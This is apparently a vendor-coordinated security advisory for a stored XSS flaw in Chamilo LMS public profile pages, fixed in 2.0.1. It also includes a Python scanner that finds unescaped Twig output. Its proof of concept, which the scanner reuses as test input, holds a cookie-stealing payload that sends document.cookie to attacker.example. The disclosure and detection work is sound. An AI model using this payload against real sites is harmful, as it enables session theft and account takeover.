Chamilo LMS: Pre-auth stored XSS on the public profile page leads to account takeover

Six user-editable profile fields are rendered on the public page /user/{username} without output encoding, so an account with the student role can execute scripts in the session of any visitor who opens the profile, including administrators.

Advisory ID: TP-2026-025
Product: Chamilo LMS (open-source learning management system in PHP)
Vulnerability type: Stored cross-site scripting (CWE-79)
CVE: CVE-2026-45144
CVSS 3.1: 8.9 (High) · CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:L
Affected versions: >= 2.0.0, < 2.0.1
Fixed in: 2.0.1
Vendor advisory: GHSA-9833-c7cj-x9xm
Reported: 23 April 2026

Summary

Chamilo LMS is a widely used open-source learning management system. The profile page GET /user/{username} is publicly accessible and renders six user-editable fields (firstname, lastname, competences, openarea, teach, diplomas) inside a {% autoescape false %} block in the Twig template, without encoding or sanitising the values server-side. An attacker with the student role (or even anonymous when self-registration is enabled) stores HTML in their profile, which then executes in the browser of any visitor, including administrators. Through theft of session, JWT or localStorage data this leads to full account takeover. turingpoint verified the flow and reported it responsibly; the vendor fixed it in 2.0.1.

Proof of Concept

The attacker (student role) stores a crafted value in the firstname field of their own profile:

firstname = <img src=x onerror=fetch('https://attacker.example/?c='+document.cookie)>

The victim (e.g. an administrator) opens the public profile page:
GET /user/<username>
-> The markup rendered inside the {% autoescape false %} block is parsed,
   the onerror handler fires in the application origin and exfiltrates
   the victim's session / JWT / localStorage data.

Because the template explicitly disables output encoding ({% autoescape false %}) and the fields are passed through without RichText::getSafeHtml(), the injected HTML stays live and executes when the profile page is opened.
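The root cause described above is a raw-output region in a Twig template combined with fields that never pass through an escaper. The following Python snippet is an added example, not Chamilo's code or template: it scans a constructed Twig fragment (modelled on the pattern the advisory describes, with assumed variable names such as user.firstname) for output expressions that sit inside {% autoescape false %} without an |e or |escape filter, and shows what the advisory's payload becomes once the field is HTML-encoded the way Twig's default autoescape would encode it.

```python
import html
import re

# Constructed Twig fragment modelled on the pattern the advisory describes.
# It is NOT the real Chamilo profile template; variable names are assumed.
TEMPLATE = """
<div class="profile">
  {% autoescape false %}
    <h1>{{ user.firstname }} {{ user.lastname }}</h1>
    <p>{{ user.competences }}</p>
    <p>{{ user.openarea|e }}</p>
  {% endautoescape %}
  <p>{{ user.teach }}</p>
</div>
"""

# Payload quoted from the advisory's proof of concept, used here only as
# test input to show the effect of proper output encoding.
PAYLOAD = "<img src=x onerror=fetch('https://attacker.example/?c='+document.cookie)>"

# A raw-output region: everything between autoescape false and endautoescape.
AUTOESCAPE_OFF = re.compile(
    r"{%\s*autoescape\s+false\s*%}(.*?){%\s*endautoescape\s*%}", re.S
)
# A Twig output expression, e.g. {{ user.firstname }} or {{ user.openarea|e }}.
OUTPUT_EXPR = re.compile(r"{{\s*(.*?)\s*}}")
# Twig's explicit escape filter, written |e or |escape.
ESCAPE_FILTER = re.compile(r"\|\s*(e|escape)\b")


def unescaped_outputs(template: str) -> list[str]:
    """Return output expressions rendered raw inside {% autoescape false %} blocks.

    Expressions outside such blocks are covered by Twig's default autoescape
    and are therefore not reported; expressions inside them are reported
    unless they carry an explicit |e / |escape filter.
    """
    findings = []
    for block in AUTOESCAPE_OFF.finditer(template):
        for expr in OUTPUT_EXPR.findall(block.group(1)):
            if not ESCAPE_FILTER.search(expr):
                findings.append(expr)
    return findings


def render_field(value: str) -> str:
    """Encode a user-controlled field for an HTML text context.

    html.escape with quote=True replaces & < > " and ', which is the same
    set Twig's default 'html' escaping strategy neutralises.
    """
    return html.escape(value, quote=True)


def is_markup_neutralised(rendered: str) -> bool:
    """True when the encoded value can no longer open or close an HTML tag."""
    return "<" not in rendered and ">" not in rendered


if __name__ == "__main__":
    for expr in unescaped_outputs(TEMPLATE):
        print(f"raw output inside autoescape false: {{{{ {expr} }}}}")
    print("encoded firstname:", render_field(PAYLOAD))
```

Running the script lists user.firstname, user.lastname and user.competences as raw outputs (user.openarea is skipped because of its |e filter, and user.teach lies outside the raw region), and prints the payload as inert text beginning with `&lt;img`, which a browser displays literally instead of parsing as an element. The same scan can be run over a template tree in CI to catch new raw-output regions before they ship.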

Is Something Like This in Your Software?

Our team found this vulnerability in the course of its work. Have your applications tested by the same specialists, with a penetration test from turingpoint.